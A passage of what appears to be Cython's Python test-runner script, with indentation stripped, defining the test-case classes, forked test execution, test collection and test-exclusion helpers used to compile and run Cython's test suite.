tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
test_selector=self.test_selector,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
# MSCV: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
def filter_test_suite(test_suite, selector):
filtered_tests = []
for test in test_suite._tests:
if isinstance(test, unittest.TestSuite):
filter_test_suite(test, selector)
elif not selector(test.id()):
continue
filtered_tests.append(test)
test_suite._tests[:] = filtered_tests
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False, test_selector=None,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.test_selector = test_selector
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in (
'warning_errors',
'clear_to_none',
'error_on_unknown_names',
'error_on_uninitialized',
# 'cache_builtins', # not currently supported due to incorrect global caching
)
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
copy = os.symlink if CAN_SYMLINK else shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
ext_compile_defines = CDEFS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
define_macros=ext_compile_defines,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if so_path and not stderr:
# normal success case => ignore non-error compiler output
stdout = None
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
if self.test_selector:
filter_test_suite(tests, self.test_selector)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
if self.test_selector:
filter_test_suite(tests, self.test_selector)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file = os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
excludelist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in excludelist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None, capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir, self.cython_root)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + self.workdir + os.pathsep + old_path
env['PYTHONPATH'] = new_path
if not env.get("PYTHONIOENCODING"):
env["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
cmd = []
out = []
err = []
for command_no, command in enumerate(self.commands, 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if 'setup.py' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command, env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res == 0 and b'REFNANNY: ' in _out:
res = -1
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = os.path.abspath(os.path.join('..', '..', 'cython.py'))
try:
subprocess.check_output([
"make",
"PYTHON='%s'" % sys.executable,
"CYTHON='%s'" % cython,
"LIBDIR1='%s'" % libdir,
"paths", "test",
])
except subprocess.CalledProcessError as err:
print(err.output.decode())
raise
self.assertTrue(True) # :)
def load_listfile(filename):
# just re-use the FileListExclude implementation
fle = FileListExcluder(filename)
return list(fle.excludes)
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, module_name in deps.items():
try:
module = __import__(module_name)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
print("Test dependency not found: '%s'" % module_name)
else:
version = self.find_dep_version(module_name, module)
print("Test dependency found: '%s' version %s" % (module_name, version))
self.tests_missing_deps = []
def find_dep_version(self, name, module):
try:
version = module.__version__
except AttributeError:
stdlib_dir = os.path.dirname(shutil.__file__) + os.sep
module_path = getattr(module, '__file__', stdlib_dir) # no __file__? => builtin stdlib module
if module_path.startswith(stdlib_dir):
# stdlib module
version = sys.version.partition(' ')[0]
elif '.' in name:
# incrementally look for a parent package with version
name = name.rpartition('.')[0]
return self.find_dep_version(name, __import__(name))
else:
version = '?.?'
return version
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = any(string_selector(ex)(testname) for ex in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
